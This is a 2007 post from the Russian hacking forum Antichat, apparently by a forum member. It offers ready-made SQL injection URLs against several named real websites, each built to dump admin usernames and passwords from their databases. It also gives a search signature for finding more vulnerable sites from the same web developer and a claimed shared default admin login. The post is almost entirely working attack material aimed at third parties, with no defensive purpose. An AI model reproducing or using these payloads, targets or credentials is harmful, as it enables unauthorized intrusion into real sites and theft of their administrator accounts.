
01.12.2007, 02:33
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
http://www.marstonsdontcompromise.co.uk/ Сайт о пиве, особенно понравилось пиво с названием "Pedigree"
Код:
http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ashes_admin)--
Походу нашел уязвимость: ищем сайты с надписью "Site by EMAC2.SCREEN". Уязвимые скрипты - все где присутствует "id="  . В основном "xxx_list.asp?id=".
Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(password+as+n
varchar)+from+admins)--
Логи и пароль кстати тоже всегда одинаковые - guillaume : plop
Примеры:
http://www.chiefinspiration.com
Код:
http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.benoitoctave.com/
Код:
http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://travel.youressentialmix.com
Код:
http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://tv.blogilvy.be/
Код:
http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
Последний раз редактировалось Ded MustD!e; 01.12.2007 в 03:08..
|
|
|